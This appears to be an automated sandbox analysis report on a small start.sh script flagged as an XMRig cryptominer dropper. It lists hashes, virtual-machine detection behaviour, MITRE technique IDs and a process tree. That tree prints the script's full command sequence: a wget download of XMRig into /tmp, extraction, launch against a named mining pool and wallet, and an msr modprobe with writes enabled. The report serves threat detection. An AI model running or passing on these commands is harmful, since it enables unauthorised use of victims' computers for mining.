xmrig | e3a24865935df812072d57a87e460d5cbe1f5f45d6fb0f470f3182f55669e6bb

Analysis

max time kernel
148s
max time network
144s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
20-03-2024 21:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

start.sh
Size

573B
MD5

badbf4901e27cdee108f6ea8ba30837e
SHA1

e8f20bcae4ce68b777f43718b12125aa0cfdf6d8
SHA256

e3a24865935df812072d57a87e460d5cbe1f5f45d6fb0f470f3182f55669e6bb
SHA512

6a5e729fdad612340e1e2d4b347ada7c372db6c015b90fa126b50c74b6d356c619c3e9243b0b83fa1fc0eaf818b571afcd75fd9af34303c411c0d755353d5831

Score

10^/10

xmrig antivm miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral7/files/fstream-4.dat	xmrig

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/xmrig-6.21.1/xmrig	1644	xmrig

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig

Reads CPU attributes 1 TTPs 45 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	xmrig
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	xmrig

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig

Enumerates kernel/hardware configuration 1 TTPs 24 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/firmware/dmi/tables/DMI	xmrig
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	xmrig
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	xmrig
File opened for reading	/sys/devices/system/node/node0/cpumap	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	xmrig
File opened for reading	/sys/module/msr/initstate	modprobe
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/devices/system/node/node0/access1/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	Process not Found
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	Process not Found
File opened for reading	/sys/devices/system/cpu	xmrig
File opened for reading	/sys/devices/system/node/node0/meminfo	xmrig
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	xmrig
File opened for reading	/sys/kernel/mm/hugepages	xmrig

Reads runtime system information 9 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/mounts	xmrig
File opened for reading	/proc/meminfo	xmrig
File opened for reading	/proc/sys/vm/nr_hugepages	xmrig
File opened for reading	/proc/cmdline	modprobe
File opened for reading	/proc/sys/kernel/random/boot_id	tar
File opened for reading	/proc/self/cpuset	xmrig
File opened for reading	/proc/driver/nvidia/gpus	xmrig
File opened for reading	/proc/meminfo	Process not Found

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/xmrig-6.21.1-linux-x64.tar.gz	wget
File opened for modification	/tmp/xmrig-6.21.1/xmrig	tar
File opened for modification	/tmp/xmrig-6.21.1/SHA256SUMS	tar
File opened for modification	/tmp/xmrig-6.21.1/config.json	tar

/tmp/start.sh
/tmp/start.sh
1⤵
PID:1460
- /usr/bin/wget
  wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz -O xmrig-6.21.1-linux-x64.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1463
- /usr/bin/tar
  tar -xvf xmrig-6.21.1-linux-x64.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1642
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1643
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1643
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1643
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1643
- /tmp/xmrig-6.21.1/xmrig
  ./xmrig --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2lin --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:1644
- - /bin/sh
    sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
    3⤵
    PID:1940
  - - /sbin/modprobe
      /sbin/modprobe msr "allow_writes=on"
      4⤵
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:1941

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
165B

MD5
2d49697ec78f6584740bf2d9f8116f43

SHA1
fec5f3b22a6a86b70452ae9789fbdd5c5a52a16c

SHA256
fbeccb436c769ac6ab4076adcf5294272d733c9495b249b0d2e46612376350c0

SHA512
ddb083f17276266e251c613162fb0363c35ca32e6c62476c919459ccf6e2e3bf17f5ea9970e439776293592554feecf7c3640296526f1a14610777f09bfc86c9

Download Submit
/tmp/xmrig-6.21.1-linux-x64.tar.gz

Filesize
2.0MB

MD5
a9bf318fc196be02e6ffe8c61ed17ee1

SHA1
1b7964571f21ce8beaebdc5d6c9d2d50ed6571e5

SHA256
0cfeb83b7573e50d02f211efbab1941ccfdfdccdfdeeeca0ed180de2e8965eb5

SHA512
f87226bea0392aeb3bb8286a8a6f0845c338cb297082cb7851050f5efe546b217dda0ee14acffc4811ef966c87ea52e1ce429a1b9e896d5773b386f8c2a41381

Download Submit
/tmp/xmrig-6.21.1/SHA256SUMS

Filesize
150B

MD5
0eeaf66a6ba6b6934ffefce538342572

SHA1
8f28c8a7345c85b2ae78924828aa16e1b6be7b97

SHA256
aa89fb25473e544be6a5cbe6a6106e220fc6cd4b935fe76bc73a19b3b6daed60

SHA512
5a8e8a77e97f2b221bf1a9097a2f19a2c3c0ed376d7e2561a41c6d74203ddbe9d0482a818d17555da44088e511b3724dd41dd7cc91e3ebaadab9c176b1a7b57d

Download Submit
/tmp/xmrig-6.21.1/config.json

Filesize
2KB

MD5
66f38c96a4901e7b345787c447842b3e

SHA1
2aa9b4d1bd2edd5d81bd9725e9318edaee67531f

SHA256
2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec

SHA512
71757fad29d6d2a257362ed28cde9f249cc8a14e646dee666c9029ea97c72de689cdf8ed5cf0365195a6a6831fe77d82efe5e2fa555c6cc5078f1f29ae8dd68f

Download Submit
/tmp/xmrig-6.21.1/xmrig

Filesize
8.5MB

MD5
65b4c5650bcb3dba777aa69822895e45

SHA1
0327c45ca2f755eac91b43d75d72bd4da4c18552

SHA256
9497e7f3b11ff94b43caa04dcde5e9c44a995a06e8a7dd54c1398b622b9dadff

SHA512
e7820e58b9e0ff06824bbe997cdfceb3e076d9042af137f29f49e9ba370752da7b5091d5a6bb372521f50682e9538f8092628148b9d35230c660f6b68c0a2b32

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads